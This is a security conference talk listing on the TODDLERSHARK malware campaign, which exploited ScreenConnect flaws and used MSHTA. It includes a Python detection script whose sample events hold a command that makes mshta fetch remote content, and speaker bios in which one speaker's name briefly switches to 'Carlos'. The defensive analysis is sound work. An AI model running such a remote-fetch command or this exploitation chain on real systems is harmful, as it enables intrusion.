All in the Shark Family: TODDLERSHARK

September 26, 2024 (GMT +8)
10:15
Ballroom 1 & 2

The Kroll CTI team, led by Keith, will talk about their analysis of a new malware campaign resembling BABYSHARK, previously associated with the APT group Kimsuky (KTA082). This malware was part of an attempted compromise exploiting vulnerabilities in ConnectWise ScreenConnect, namely CVE-2024-1708 and CVE-2024-1709. These vulnerabilities enable authentication bypass and remote code execution.

The threat actor gained access through ScreenConnect's setup wizard and executed MSHTA with a URL leading to VB-based malware. The malware employed heavy obfuscation and randomly generated code to evade detection. It downloaded a second-stage payload with functionalities including modifying registry keys, stealing system information, and setting up scheduled tasks.

The stolen information was encoded in PEM certificates and exfiltrated to a C2 server. Additionally, the malware created a scheduled task to periodically check for further instructions. The code and behavior of this malware closely resemble BABYSHARK, suggesting it is an iteration of the original.

This malware demonstrates polymorphic behavior, making it challenging to detect. It utilizes legitimate Microsoft binaries for execution and dynamically generates C2 URLs. The use of known vulnerabilities in ScreenConnect highlights the importance of patching systems promptly to prevent exploitation.
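The MSHTA launch described above (a script host started from ScreenConnect with a URL argument, i.e. a legitimate Microsoft binary used for execution) is the kind of behavior an endpoint detection rule can catch. The following is an added example, not code from the talk or from Kroll: a small Python detector run over constructed Sysmon-style process-creation records. The field names, the ScreenConnect image name used for the parent match, and the sample paths and IP address are all assumptions.

```python
import re
from pathlib import PureWindowsPath

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# Script-host LOLBins that can fetch and run remote content.
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}

# Constructed process-creation records in a Sysmon Event ID 1 style (not real telemetry).
SAMPLE_EVENTS = [
    {"id": 1,
     "parent_image": r"C:\Program Files (x86)\ScreenConnect Client (abc)\ScreenConnect.ClientService.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://198.51.100.7/update"},   # remote HTA via ScreenConnect
    {"id": 2,
     "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r"mshta.exe C:\Users\alice\tool.hta"},     # local HTA from the shell
    {"id": 3,
     "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": "notepad.exe"},
]


def classify(event):
    """Return (severity, reasons) for one event, or None when nothing matches."""
    image = PureWindowsPath(event["image"]).name.lower()
    parent = PureWindowsPath(event["parent_image"]).name.lower()
    reasons = []
    if image in SCRIPT_HOSTS and URL_RE.search(event["command_line"]):
        reasons.append(f"{image} launched with a remote URL argument")
    # Assumption: ScreenConnect components carry "screenconnect" in the image name.
    if image in SCRIPT_HOSTS and "screenconnect" in parent:
        reasons.append(f"{image} spawned by remote-access tool {parent}")
    if not reasons:
        return None
    # Both indicators together match the ScreenConnect-to-MSHTA chain; one alone is suspicious.
    return ("high" if len(reasons) == 2 else "medium"), reasons


def detect(events):
    """Run classify() over a batch and return (event id, severity, reasons) per hit."""
    findings = []
    for event in events:
        verdict = classify(event)
        if verdict:
            findings.append((event["id"], verdict[0], verdict[1]))
    return findings


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```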

Speaker

Keith Wojcieszek is the global head of threat intelligence in Kroll's Cyber Risk practice, based in the Washington, D.C. office. Keith joined Kroll from the U.S. Secret Service, where he served with distinction for 15 years. Keith founded and leads Kroll's Cyber Threat Intelligence program, manages a wide range of cybercrime, data loss and incident response investigations, and is a trusted advisor to clients involved in compliance-related or sensitive local and global cyber security matters. He also has extensive experience working with international stakeholders on complex transnational investigations and initiatives.

Ely Tingson is a senior vice president for Cyber Threat Intelligence in the Cyber Risk practice, based in Metro Manila. Carlos leverages more than 10 years of experience in assisting some of the region's most critical national security teams with managing and mitigating their cyber risk.

Prior to joining Kroll, Ely served as Data Protection Officer at the Presidential Security Group (PSG) and led the Technical Surveillance Countermeasures (TSCM) and Electronic Countermeasures (ECM) teams. While at the PSG, he concurrently held the title of cyber security consultant at the National Security Council, Office of the President, Republic of the Philippines. Ely is also a member of the Philippine Military Academy “Mandala” Class of 2006, having earned his commission in the Philippine Army, and served in the 2nd Infantry Division and the Special Operations Command.
